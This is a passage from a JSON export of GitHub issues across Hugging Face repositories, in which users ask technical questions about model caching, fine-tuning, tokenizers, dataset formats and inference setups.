issue. Apology if it isn't and please direct me to the right place.\r\n\r\nI have been using transformer in docker images that are deployed at runpod/replicate. The containers of the images could go cold and be relaunched again and again. Each time the container would waste 20 to 40 seconds for the blow cache upgrade.\r\n\r\n```\r\nThe cache for model files in Transformers v4.22.0 has been updated. Migrating your old cache. This is a one-time only operation. You can interrupt this and resume the migration later on by calling `transformers.utils.move_cache()`.\r\n```\r\n\r\nIt would take around 20 to 40 seconds, which is a significant waste of our GPU time and container startup time.\r\n\r\nI have tried to find out how to preupgrade the cache and build the upgrade cache into docker image by google but I couldn't find a way to do it.\r\n\r\nPlease advise how to preupgrade the cache and build the upgraded cache in docker image.\r\n\r\nMany thanks.\r\n\r\n### Expected behavior\r\n\r\nThe cache for model files is preupgraded and built into container image to avoid upgrade each time a container is launched.\r\n\r\n", "url": "https://github.com/huggingface/transformers/issues/27526", "state": "closed", "labels": [], "created_at": "2023-11-16T02:53:54Z", "updated_at": "2023-12-24T08:03:44Z", "user": "lanyusan" }, { "repo": "huggingface/optimum", "number": 1538, "title": "Optimum supports AMDGPU\u3000\uff1f", "body": "### Feature request\n\nOnnxruntime supports AMD-ROCM \uff0c\r\nhow to compile on optimum\n\n### Motivation\n\nOur company is currently testing amdgpu and has learned that optim can accelerate inference on CUDA. We are not sure if it will support ROCM in the future?\n\n### Your contribution\n\nnone", "url": "https://github.com/huggingface/optimum/issues/1538", "state": "closed", "labels": [], "created_at": "2023-11-15T04:15:21Z", "updated_at": "2024-01-09T16:10:39Z", "comments": 1, "user": "taikai-zz" }, { "repo": "huggingface/tokenizers", "number": 1391, "title": "How to split special token in encode?", "body": "i have converted a slow tokenizer into PreTrainedTokenizerFast, and get a tokenizer.json file.But i found that this tokenizer did not split special tokens.Here is my add_tokens in tokenizer.json:\r\n` tokenizer.add_special_tokens(\r\n [\r\n AddedToken(\"[gMASK]\", normalized=True, single_word=False),\r\n AddedToken(\"sop\", normalized=True, single_word=False),\r\n ]\r\n )\r\n`\r\n ", "url": "https://github.com/huggingface/tokenizers/issues/1391", "state": "closed", "labels": [], "created_at": "2023-11-15T03:41:22Z", "updated_at": "2024-01-04T06:26:38Z", "user": "leizhao1234" }, { "repo": "huggingface/diffusers", "number": 5786, "title": "How to load a precomputed dataset in the cache folder on a different machine?", "body": "**Is your feature request related to a problem? Please describe.**\r\n\r\nSome slurm cluster may have a limit on time allocation, so I'd like to precompute the dataset on my local machine then move it to a location on the cluster to directly reuse it.\r\n\r\n**Describe the solution you'd like**\r\n\r\nI saw load dataset automatically create arrow files inside ~/.cache/imagefolder, and the dataset folder path is translated into some hash code. So I hope I can copy the dataset here and pass it to --dataset_name in training SDXL unet. Or perhaps I'm not aware now, some ways to let me reuse the precomputed cached dataset on a different machine.\r\n\r\n**Describe alternatives you've considered**\r\nplease see above.\r\n\r\n\r\n**Additional context**\r\n please see above", "url": "https://github.com/huggingface/diffusers/issues/5786", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2023-11-14T02:26:00Z", "updated_at": "2024-01-09T15:07:14Z", "user": "linnanwang" }, { "repo": "huggingface/alignment-handbook", "number": 22, "title": "How to perform full parameter finetuning without A100 GPUs", "body": "Hi, thank you for your great work! I'd like to reproduce full parameter fine-tuning of dpo training. However I only have 10 * Nvidia A40 GPUs (46 Gbs memory each).\r\n\r\nI tried the command\r\n\r\n`CUDA_VISIBLE_DEVICES=2,3,4,5,6,7,8,9 ACCELERATE_LOG_LEVEL=info accelerate launch --config_file recipes/accelerate_configs/deepspeed_zero3.yaml --main_process_port 6000 scripts/run_dpo.py recipes/zephyr-7b-beta/dpo/config_full.yaml`\r\n\r\nand it reported OOM error, even if I set batch size to 1.\r\n\r\nI don't mind the program runs a bit slower (e.g., use smaller batchsize and more gradient accumulation steps). However, I don't know if there is a way to successfully deploy the full-dpo code. \r\n\r\nCan you help me, please?\r\n\r\n\r\nAlso, I'm wondering how large is the performance gap between lora and full parameter finetunning.", "url": "https://github.com/huggingface/alignment-handbook/issues/22", "state": "open", "labels": [], "created_at": "2023-11-14T01:33:41Z", "updated_at": "2024-02-14T13:47:16Z", "user": "ChenDRAG" }, { "repo": "huggingface/controlnet_aux", "number": 83, "title": "How to get keypoints output .json file like original OpenPose ?", "body": "", "url": "https://github.com/huggingface/controlnet_aux/issues/83", "state": "open", "labels": [], "created_at": "2023-11-13T21:55:35Z", "updated_at": "2023-11-17T21:04:49Z", "user": "mayank64ce" }, { "repo": "huggingface/chat-ui", "number": 550, "title": "Can this ui be run on a colab?", "body": "I am wondering if this ui can be used inside a colab.", "url": "https://github.com/huggingface/chat-ui/issues/550", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-13T16:58:35Z", "updated_at": "2023-11-15T16:17:10Z", "user": "amida47" }, { "repo": "huggingface/text-generation-inference", "number": 1258, "title": "How to deal with bias=True Model", "body": "### Feature request\n\nHow to deploy model within bias=True. Example: vinai/PhoGPT-7B5-Instruct\n\n### Motivation\n\n.\n\n### Your contribution\n\n.", "url": "https://github.com/huggingface/text-generation-inference/issues/1258", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-11-13T09:20:08Z", "updated_at": "2024-01-20T01:46:38Z", "user": "anhnh2002" }, { "repo": "huggingface/trl", "number": 985, "title": "how to setup epoch number in SFTTrainer?", "body": "there my example code\r\nfrom datasets import load_dataset\r\nfrom trl import SFTTrainer\r\n\r\ndataset = load_dataset(\"IMDB\", split=\"train\")\r\n\r\ntrainer = SFTTrainer(\r\n \"sshleifer/tiny-gpt2\",\r\n train_dataset=dataset,\r\n dataset_text_field=\"text\",\r\n max_seq_length=512,\r\n)\r\ntrainer.train()", "url": "https://github.com/huggingface/trl/issues/985", "state": "closed", "labels": [], "created_at": "2023-11-12T20:02:31Z", "updated_at": "2023-11-14T18:29:53Z", "user": "KlausikPL" }, { "repo": "huggingface/diffusers", "number": 5774, "title": "How to fine tune Stable Diffusion on custom dataset {caption, image}?", "body": "I need to do the task that fine tuning SD on custom dataset {caption, image} and custom size? Could you please give me a tutorial for this task?", "url": "https://github.com/huggingface/diffusers/issues/5774", "state": "closed", "labels": [ "stale" ], "created_at": "2023-11-12T14:52:23Z", "updated_at": "2024-01-09T15:07:21Z", "user": "npk7264" }, { "repo": "huggingface/diffusers", "number": 5772, "title": "Does webdataset faster than default huggingface datasets?", "body": "### Describe the bug\n\nHi, I see there is a large scale training example https://github.com/huggingface/diffusers/blob/controlnet_webdatasets/examples/controlnet/train_controlnet_webdatasets.py using webdatasets, which suggests that webdatasets may have better data loading performance than huggingface datasets that is organized with Apache Arrow.\r\n\r\nThen, I'm wondering whether or not webdatasets is a good choice for me. I have a image dataset with 350k images, the size of the image is 768 * 768. I use a batch size of 64 or 192. Does webdataset is for me? Any help would be appreciated!\n\n### Reproduction\n\n.\n\n### Logs\n\n_No response_\n\n### System Info\n\n.\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/5772", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2023-11-12T08:40:22Z", "updated_at": "2024-01-09T15:07:23Z", "user": "Luciennnnnnn" }, { "repo": "huggingface/chat-ui", "number": 549, "title": "How can I use this offline with local models?", "body": "I really like the web_search feature, can I somehow use it with local models? I tried but I dont see any bat files to launch it.", "url": "https://github.com/huggingface/chat-ui/issues/549", "state": "closed", "labels": [ "support" ], "created_at": "2023-11-11T23:59:09Z", "updated_at": "2023-11-20T21:38:27Z", "comments": 9, "user": "iChristGit" }, { "repo": "huggingface/diffusers", "number": 5766, "title": "Image+Image+Text to Image", "body": "Maybe a dumb question but I can't seem to find good ways to have multiple images to image modeling. I looked into Multi-ControlNet but I can't tell how to use it. I'm trying to train a model that takes in 2 images and a prompt: \r\n1. a template base image (e.g. a photo of a room in someone's house with a painting on the wall)\r\n2. a photo of a painting someone made (e.g. not a famous one like a Van Gogh, just someone's painting)\r\n3. an optional text prompt describing the 2nd image...may not be necessary but curious what people here say\r\n\r\nAnd I want to place image2 in image1 to replace the painting on the wall with the new one. Is this the right forum / model to use? I thought maybe creating a custom dataset and then simply feeding 2 image controls in would do the job but really could use some experts' guidance here. ", "url": "https://github.com/huggingface/diffusers/issues/5766", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2023-11-11T20:15:27Z", "updated_at": "2024-01-09T15:07:25Z", "user": "tval2" }, { "repo": "huggingface/optimum", "number": 1531, "title": "Pytorch + TensorRT support", "body": "### Feature request\n\nIs it possible to start supporting Pytorch and TensorRT inference optimizations? There are a lot of use cases where it could be useful, and optimum seems to already have a lot of good tooling to enable this.\n\n### Motivation\n\nUsing Pytorch or TensorRT in production is painful today, and requires a lot of custom optimizations.\n\n### Your contribution\n\nI could help with a PR.", "url": "https://github.com/huggingface/optimum/issues/1531", "state": "closed", "labels": [ "feature-request", "Stale" ], "created_at": "2023-11-11T17:27:47Z", "updated_at": "2025-02-27T02:04:37Z", "comments": 2, "user": "youssefadr" }, { "repo": "huggingface/optimum", "number": 1530, "title": "AnimateDiff support?", "body": "### Feature request\n\nHi!\r\ncan u guys please support animatediff for onnx in the future? it will be great for both gpu directml and cpu too\r\n\r\nkind regards\n\n### Motivation\n\nnot a bug, just a feature that i really would like to see for us directml and cpu users for onnx\n\n### Your contribution\n\ni would but i don't know anything about coding. i'm just a casual user", "url": "https://github.com/huggingface/optimum/issues/1530", "state": "closed", "labels": [ "feature-request", "Stale" ], "created_at": "2023-11-11T14:21:25Z", "updated_at": "2025-03-01T02:08:38Z", "comments": 1, "user": "Amin456789" }, { "repo": "huggingface/autotrain-advanced", "number": 338, "title": "How to ", "body": "I successfully trained the mistral 7B sharded model on google colab using the autotrain\r\n\r\nNow, how can I do inference , I am unable to merger the adapter with the base model , can someone please share the code for inference with me . Please help", "url": "https://github.com/huggingface/autotrain-advanced/issues/338", "state": "closed", "labels": [ "stale" ], "created_at": "2023-11-11T12:58:24Z", "updated_at": "2024-05-06T13:35:52Z", "user": "eviIgenius" }, { "repo": "huggingface/diffusers", "number": 5761, "title": "The cost of consistency decoder", "body": "### Describe the bug\n\nI replace original VAE decoder of a stable diffusion model with Consistency Decoder, then CUDA out of memory occurs. My question is that How large of Consistency Decoder is compared to original VAE decoder.\r\n\r\n- `diffusers` version: 0.23.0\r\n- Platform: Linux-5.15.0-60-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.11\r\n- PyTorch version (GPU?): 2.0.0+cu118 (True)\r\n- Huggingface_hub version: 0.17.3\r\n- Transformers version: 4.34.0\r\n- Accelerate version: 0.23.0\r\n- xFormers version: 0.0.18\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \n\n### Reproduction\n\nDecode a large latent\n\n### Logs\n\n_No response_\n\n### System Info\n\n..\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/5761", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2023-11-11T03:54:20Z", "updated_at": "2024-01-09T15:07:30Z", "user": "Luciennnnnnn" }, { "repo": "huggingface/candle", "number": 1319, "title": "Question: How to edit specific indices of a tensor?", "body": "Hello everybody,\r\n\r\nWhile developing beam search for candle-sampling, I have run into a small issue where it appears there is no way to edit specific indices of a tensor after creation. For example, in Python the following works for lists (and very similar for pytorch tensors):\r\n\r\n```python\r\nvalues = [[1,2,3],[4,5,6]]\r\nvalues[0][0] = 0\r\nprint(values) #[[0,2,3],[4,5,6]]\r\n```\r\n\r\nIs there an equivalent in `Candle` which I can use to edit specific indices of a tensor without creating a new tensor?", "url": "https://github.com/huggingface/candle/issues/1319", "state": "closed", "labels": [], "created_at": "2023-11-11T01:10:42Z", "updated_at": "2023-11-26T15:53:19Z", "user": "EricLBuehler" }, { "repo": "huggingface/datasets", "number": 6400, "title": "Safely load datasets by disabling execution of dataset loading script", "body": "### Feature request\n\nIs there a way to disable execution of dataset loading script using `load_dataset`? This is a security vulnerability that could lead to arbitrary code execution. \r\n\r\nAny suggested workarounds are welcome as well. \n\n### Motivation\n\nThis is a security vulnerability that could lead to arbitrary code execution. \n\n### Your contribution\n\nn/a", "url": "https://github.com/huggingface/datasets/issues/6400", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-11-10T23:48:29Z", "updated_at": "2024-06-13T15:56:13Z", "comments": 4, "user": "irenedea" }, { "repo": "huggingface/diffusers", "number": 5758, "title": "how to run huggingface model in replicate", "body": "### Describe the bug\r\n\r\ni am trying to run https://medium.com/ai-artistry/streamlining-ai-agent-development-with-autogen-and-llava-b84fb0d25262 code by adding https://huggingface.co/LLaVA-VL/llava_plus_v0_7b instead of replicate code.\r\n\r\nMy Question is: Challenges running the huggingface model using replicate?\r\n\r\nsomething like this \ud83d\udc4d \r\n```\r\nresponse = replicate.run(\r\n \"yorickvp/llava-13b:2facb4a474a0462c15041b78b1ad70952ea46b5ec6ad29583c0b29dbd4249591\",\r\n input={\"image\": img, \"prompt\": prompt.replace(\"\", \" \")}\r\n )\r\n```\r\ni tried \r\n```\r\nfrom transformers import HfAgent\r\nagent = HfAgent(\"https://api-inference.huggingface.co/models/LLaVA-VL/llava_plus_v0_7b\", additional_tools={\"prompt\": \"Show me a tree\"})\r\n\r\nagent.run(return_code=True)\r\n```\r\n```\r\n---------------------------------------------------------------------------\r\nTypeError Traceback (most recent call last)\r\nCell In[15], line 4\r\n 1 from transformers import HfAgent\r\n 2 agent = HfAgent(\"https://api-inference.huggingface.co/models/LLaVA-VL/llava_plus_v0_7b\", additional_tools={\"prompt\": \"Show me a tree\"})\r\n----> 4 agent.run( return_code=True)\r\n\r\nTypeError: Agent.run() missing 1 required positional argument: 'task'\r\n```\r\n\r\n### Reproduction\r\n\r\nChallenges running the huggingface model using replicate\r\n\r\nsomething like this \ud83d\udc4d \r\n```\r\nresponse = replicate.run(\r\n \"yorickvp/llava-13b:2facb4a474a0462c15041b78b1ad70952ea46b5ec6ad29583c0b29dbd4249591\",\r\n input={\"image\": img, \"prompt\": prompt.replace(\"\", \" \")}\r\n )\r\n```\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nRTX 3090\r\n\r\n### Who can help?\r\n\r\n@patrickvonplaten @sayakpaul @williamberman ", "url": "https://github.com/huggingface/diffusers/issues/5758", "state": "closed", "labels": [ "bug" ], "created_at": "2023-11-10T20:31:04Z", "updated_at": "2023-11-11T03:33:51Z", "user": "andysingal" }, { "repo": "huggingface/diffusers", "number": 5756, "title": "How to we generate LCM LoRA of an existing model?", "body": "I generated a DreamBooth model from SDXL base 1.0\r\n\r\nTo get the speed boost of LCM I need to generate a LCM LoRA from this model\r\n\r\nHow we do it? I don't see documentation ", "url": "https://github.com/huggingface/diffusers/issues/5756", "state": "closed", "labels": [ "stale" ], "created_at": "2023-11-10T15:44:52Z", "updated_at": "2023-12-27T13:28:38Z", "user": "FurkanGozukara" }, { "repo": "huggingface/chat-ui", "number": 548, "title": "MaxListenersExceededWarning: Possible EventEmitter memory leak detected.", "body": "Running dev, and no errors until i try to write into the chat interface on the website locally hosted in WSL2 (win11).\r\n\r\nWorked before i updated to version v.0.6.0\r\n\r\nerror message in web ui:\r\n![image](https://github.com/huggingface/chat-ui/assets/1792727/adc2f421-6cb7-400d-b559-1240b13ff349)\r\n\r\n\r\nError message in terminal:\r\n\r\n> root@xxxxxxxxx:/mnt/c/WSL/HuggingChat test/AI# npm run dev-chat-ui\r\n> \r\n> > ai@1.0.0 dev-chat-ui\r\n> > cd ../chat-ui && npm run dev -- --host 0.0.0.0\r\n> \r\n> \r\n> > chat-ui@0.6.0 dev\r\n> > vite dev --host 0.0.0.0\r\n> \r\n> \r\n> \r\n> VITE v4.3.9 ready in 15775 ms\r\n> \r\n> \u279c Local: http://localhost:5173/\r\n> \u279c Network: http://172.xx.142.227:5173/\r\n> \u279c press h to show help\r\n> (node:80446) **MaxListenersExceededWarning: Possible EventEmitter memory leak detected. 11 close listeners added to [TLSSocket]. Use emitter.setMaxListeners() to increase limit**\r\n> (Use `node --trace-warnings ...` to show where the warning was created)\r\n> 2:44:12 PM [vite] Error when evaluating SSR module /src/lib/server/websearch/sentenceSimilarity.ts:\r\n> |- TypeError: fetch failed\r\n> at fetch (/mnt/c/WSL/HuggingChat test/chat-ui/node_modules/undici/index.js:110:15)\r\n> at processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n> at runNextTicks (node:internal/process/task_queues:64:3)\r\n> at listOnTimeout (node:internal/timers:540:9)\r\n> at process.processTimers (node:internal/timers:514:7)\r\n> at async getModelFile (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:468:24)\r\n> at async getModelJSON (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n> at async Promise.all (index 0)\r\n> at async loadTokenizer (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:56:16)\r\n> at async AutoTokenizer.from_pretrained (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:3778:48)\r\n> \r\n> 2:44:12 PM [vite] Error when evaluating SSR module /src/lib/server/websearch/runWebSearch.ts: failed to import \"/src/lib/server/websearch/sentenceSimilarity.ts\"\r\n> |- TypeError: fetch failed\r\n> at fetch (/mnt/c/WSL/HuggingChat test/chat-ui/node_modules/undici/index.js:110:15)\r\n> at processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n> at runNextTicks (node:internal/process/task_queues:64:3)\r\n> at listOnTimeout (node:internal/timers:540:9)\r\n> at process.processTimers (node:internal/timers:514:7)\r\n> at async getModelFile (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:468:24)\r\n> at async getModelJSON (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n> at async Promise.all (index 0)\r\n> at async loadTokenizer (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:56:16)\r\n> at async AutoTokenizer.from_pretrained (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:3778:48)\r\n> \r\n> 2:44:12 PM [vite] Error when evaluating SSR module /mnt/c/WSL/HuggingChat test/chat-ui/src/routes/conversation/[id]/+server.ts: failed to import \"/src/lib/server/websearch/runWebSearch.ts\"\r\n> |- TypeError: fetch failed\r\n> at fetch (/mnt/c/WSL/HuggingChat test/chat-ui/node_modules/undici/index.js:110:15)\r\n> at processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n> at runNextTicks (node:internal/process/task_queues:64:3)\r\n> at listOnTimeout (node:internal/timers:540:9)\r\n> at process.processTimers (node:internal/timers:514:7)\r\n> at async getModelFile (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:468:24)\r\n> at async getModelJSON (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n> at async Promise.all (index 0)\r\n> at async loadTokenizer (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:56:16)\r\n> at async AutoTokenizer.from_pretrained (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:3778:48)\r\n> \r\n> TypeError: fetch failed\r\n> at fetch (/mnt/c/WSL/HuggingChat test/chat-ui/node_modules/undici/index.js:110:15)\r\n> at processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n> at runNextTicks (node:internal/process/task_queues:64:3)\r\n> at listOnTimeout (node:internal/timers:540:9)\r\n> at process.processTimers (node:internal/timers:514:7)\r\n> at async getModelFile (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:468:24)\r\n> at async getModelJSON (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n> at async Pr", "url": "https://github.com/huggingface/chat-ui/issues/548", "state": "closed", "labels": [ "support" ], "created_at": "2023-11-10T13:56:03Z", "updated_at": "2023-11-16T20:02:07Z", "comments": 7, "user": "patchie" }, { "repo": "huggingface/sentence-transformers", "number": 2355, "title": "How to Finetune a Clip Model with Custom Data ", "body": "I want to do my custom data training to get high accuracy embeddings of my image data.\r\n\r\nAre there any scripts or documentation that would be helpful?\r\n\r\nthank you.", "url": "https://github.com/huggingface/sentence-transformers/issues/2355", "state": "closed", "labels": [], "created_at": "2023-11-10T07:27:23Z", "updated_at": "2023-12-25T03:23:20Z", "user": "unmo" }, { "repo": "huggingface/diffusers", "number": 5742, "title": "where is the Parameter Description?", "body": "", "url": "https://github.com/huggingface/diffusers/issues/5742", "state": "closed", "labels": [], "created_at": "2023-11-10T07:07:03Z", "updated_at": "2023-11-13T18:01:56Z", "user": "MRG-DOT" }, { "repo": "huggingface/setfit", "number": 436, "title": "\u3010question\u3011could you tell me the latest embedding model which usable by setfit?", "body": "Hi!\r\nThis is not bug report but question.\r\nFrom my understand, when we use SetFit, we have to choose one of embedding model from sentense transformer.\r\nBut now, I feel those models are kind of old and would like to know the latest model for embedding which can be used by setfit\r\n\r\nThank you in adv", "url": "https://github.com/huggingface/setfit/issues/436", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-10T02:10:01Z", "updated_at": "2023-11-12T01:02:24Z", "user": "Yongtae723" }, { "repo": "huggingface/datasets", "number": 6394, "title": "TorchFormatter images (H, W, C) instead of (C, H, W) format", "body": "### Describe the bug\r\n\r\nUsing .set_format(\"torch\") leads to images having shape (H, W, C), the same as in numpy. \r\nHowever, pytorch normally uses (C, H, W) format.\r\n\r\nMaybe I'm missing something but this makes the format a lot less useful as I then have to permute it anyways.\r\nIf not using the format it is possible to directly use torchvision transforms but any non-transformed value will not be a tensor.\r\n\r\nIs there a reason for this choice?\r\n\r\n### Steps to reproduce the bug\r\n\r\n```python\r\nfrom datasets import Dataset, Features, Audio, Image\r\nimages = [\"path/to/image.png\"] * 10\r\nfeatures = Features({\"image\": Image()})\r\nds = Dataset.from_dict({\"image\": images}, features=features) \r\nds = ds.with_format(\"torch\")\r\nds[0][\"image\"].shape\r\n```\r\n```python\r\ntorch.Size([512, 512, 4])\r\n```\r\n\r\n### Expected behavior\r\n\r\n```python\r\nfrom datasets import Dataset, Features, Audio, Image\r\nimages = [\"path/to/image.png\"] * 10\r\nfeatures = Features({\"image\": Image()})\r\nds = Dataset.from_dict({\"image\": images}, features=features) \r\nds = ds.with_format(\"torch\")\r\nds[0][\"image\"].shape\r\n```\r\n```python\r\ntorch.Size([4, 512, 512])\r\n```\r\n\r\n### Environment info\r\n\r\n- `datasets` version: 2.14.6\r\n- Platform: Linux-6.5.9-100.fc37.x86_64-x86_64-with-glibc2.31\r\n- Python version: 3.11.6\r\n- Huggingface_hub version: 0.18.0\r\n- PyArrow version: 14.0.1\r\n- Pandas version: 2.1.2", "url": "https://github.com/huggingface/datasets/issues/6394", "state": "closed", "labels": [], "created_at": "2023-11-09T16:02:15Z", "updated_at": "2024-04-11T12:40:16Z", "comments": 9, "user": "Modexus" }, { "repo": "huggingface/transformers.js", "number": 386, "title": "[Question] Any plan to rewrite js in typescript ?", "body": "I'm doing it for my own usage although I'm loosing the benfit of upgrades.\r\n\r\nTypings are usefull you know :)\r\n\r\nWhile doing it I found this,\r\nin models.js, line 1027 :\r\n```javascript\r\nlet sampledTokens = sampler(logits);\r\n```\r\nshould be \r\n```javascript\r\nlet sampledTokens = sampler.sample(logits);\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/386", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-09T13:41:10Z", "updated_at": "2023-11-15T18:18:39Z", "user": "pnocera" }, { "repo": "huggingface/candle", "number": 1304, "title": "How to repeat_interleave on Tensor?", "body": "There is [repeat_interleave](https://pytorch.org/docs/stable/generated/torch.repeat_interleave.html) function, but I can't find analog in candle.\r\n\r\nI need convert `tensor([[6110, 1]])` to `tensor([[6110, 1], [6110, 1], [6110, 1]])`\r\n\r\nI found some examples [like](https://github.com/huggingface/candle/blob/f772213e844fdfcc8dbaf662fc11819f4028dc78/candle-transformers/src/models/segment_anything/mask_decoder.rs#L234) this and [this](https://github.com/huggingface/candle/blob/73d02f4f57c788c43f3e11991635bc15701c25c0/candle-transformers/src/models/mpt.rs#L137). But in my case the result is `tensor([6110, 6110, 6110, 1, 1, 1])`.\r\n\r\nLooks like I do something wrong: :-D I expect result the same as from python https://github.com/huggingface/transformers/blob/main/src/transformers/generation/utils.py#L3090C31-L3090C31\r\n\r\nHow I can repeat python example in current candle version?", "url": "https://github.com/huggingface/candle/issues/1304", "state": "closed", "labels": [], "created_at": "2023-11-09T06:31:04Z", "updated_at": "2023-11-09T08:16:19Z", "user": "bragovo" }, { "repo": "huggingface/diffusers", "number": 5709, "title": "How to run stable diffusion pipeline using multithreading in fastapi ?", "body": "Hi.. I have created an stable diffusion API using Fastapi and it is working perfectly fine if sequential request are been made. I have tried to implement multithreading in the api to concurrently run multiple request, but the problem is every request output generation time is dependent on total number of request that are made. For Eg. if one request takes 5 secs to run, and if 5 request are made simultaneously then it will take 5*5 = 25 secs for every request to get output. After researching about these problem, I get know that GIL (Global Interpreter Lock) in python is allowing only one thread to execute per process. So we will get same output as single thread if we use multithreading in these purpose. Also, I have tried multiprocessing to overcome this issue but it is loading multiple instances of the same model for each process and its become very hard to load all model in 16 GB RAM.\r\n\r\nDo you know how to get output in same time for every requests that are made. If 5 requests are made concurrently then every request should get output in 5 seconds only. Also do gpu configuration matters tp gets results in quick time based on number of request ?\r\n\r\nGPU Configuration:\r\nNvidia 3050 8GB RAM\r\n\r\n@sayakpaul @patrickvonplaten ", "url": "https://github.com/huggingface/diffusers/issues/5709", "state": "closed", "labels": [ "stale" ], "created_at": "2023-11-08T16:19:45Z", "updated_at": "2024-01-09T15:07:46Z", "user": "minkvirparia" }, { "repo": "huggingface/gsplat.js", "number": 23, "title": "How do you set up initial camera position?", "body": "When loading a splat file, I'd like to set the initial camera position to a specific location. How can this be achieved?", "url": "https://github.com/huggingface/gsplat.js/issues/23", "state": "closed", "labels": [ "enhancement", "question" ], "created_at": "2023-11-08T16:04:04Z", "updated_at": "2023-11-11T16:35:57Z", "user": "reconlabs-chris" }, { "repo": "huggingface/safetensors", "number": 381, "title": "Would a CLI to perform convert operation be useful?", "body": "### Feature request\n\nCould it be possible to add to this repo a CLI tool that would use the library to convert files stored in different format and convert them to safetensors.\r\nIt would be useful to have also from the command line a way to introspect a model and find some property about it (layers, metadata, ...)\n\n### Motivation\n\nI'm frustrated when I got a lot of example models on my disk that I'm not too sure about and I would like to have a quick and easy way from the command line to inspect them, convert them, compress them and do all the tasks I need to perform straight from the command line with completion support.\n\n### Your contribution\n\nI could contribute design suggestions about the interface but I have no particular knowledge of Rust and I'm learning transformers and ML in general.", "url": "https://github.com/huggingface/safetensors/issues/381", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-11-08T15:39:02Z", "updated_at": "2024-01-02T01:48:28Z", "comments": 2, "user": "remyleone" }, { "repo": "huggingface/transformers", "number": 27361, "title": "Add how to preprocess mask for finetuning with SAM", "body": "### Feature request\n\nThe [SAM image processor](https://github.com/huggingface/transformers/blob/main/src/transformers/models/sam/image_processing_sam.py) takes images as input and resizes them so that the longest edge is 1024 (using default values). This is the size expect as input fo the SAM model. \r\nFor inference, this works fine as only the images need resizing but for fine-tuning as per [this tutorial](https://github.com/NielsRogge/Transformers-Tutorials/blob/master/SAM/Fine_tune_SAM_(segment_anything)_on_a_custom_dataset.ipynb), you need to resize both your images and your masks as the SAM model produces `pred_masks` with size 256x256. If I don't resize my masks I get `ground truth has different shape (torch.Size([2, 1, 768, 1024])) from input (torch.Size([2, 1, 256, 256]))` when trying to calculate loss.\r\n\r\nTo fix this, I've currently written a resize and pad function into my code:\r\n\r\n```\r\nfrom PIL import Image\r\n\r\ndef resize_mask(image):\r\n longest_edge = 256\r\n \r\n # get new size\r\n w, h = image.size\r\n scale = longest_edge * 1.0 / max(h, w)\r\n new_h, new_w = h * scale, w * scale\r\n new_h = int(new_h + 0.5)\r\n new_w = int(new_w + 0.5)\r\n\r\n resized_image = image.resize((new_w, new_h), resample=Image.Resampling.BILINEAR)\r\n return resized_image\r\n\r\ndef pad_mask(image):\r\n pad_height = 256 - image.height\r\n pad_width = 256 - image.width\r\n\r\n padding = ((0, pad_height), (0, pad_width))\r\n padded_image = np.pad(image, padding, mode=\"constant\")\r\n return padded_image\r\n\r\ndef process_mask(image):\r\n resized_mask = resize_mask(image)\r\n padded_mask = pad_mask(resized_mask)\r\n return padded_mask\r\n```\r\n\r\nand then have added this to my definition of SAMDataset:\r\n\r\n```\r\nclass SAMDataset(Dataset):\r\n def __init__(self, dataset, processor, transform = None):\r\n self.dataset = dataset\r\n self.processor = processor\r\n self.transform = transform\r\n\r\n def __len__(self):\r\n return len(self.dataset)\r\n\r\n def __getitem__(self, idx):\r\n item = self.dataset[idx]\r\n \r\n if self.transform:\r\n image = self.transform(item[\"pixel_values\"])\r\n else:\r\n image = item[\"pixel_values\"]\r\n \r\n # get bounding box prompt\r\n padded_mask = process_mask(item[\"label\"])\r\n prompt = get_bounding_box(padded_mask)\r\n\r\n # prepare image and prompt for the model\r\n inputs = self.processor(image, input_boxes=[[prompt]], return_tensors=\"pt\")\r\n\r\n # remove batch dimension which the processor adds by default\r\n inputs = {k:v.squeeze(0) for k,v in inputs.items()}\r\n\r\n # add ground truth segmentation\r\n inputs[\"ground_truth_mask\"] = padded_mask\r\n\r\n return inputs\r\n```\r\n\r\nThis seems to work fine. \r\n\r\nWhat I think 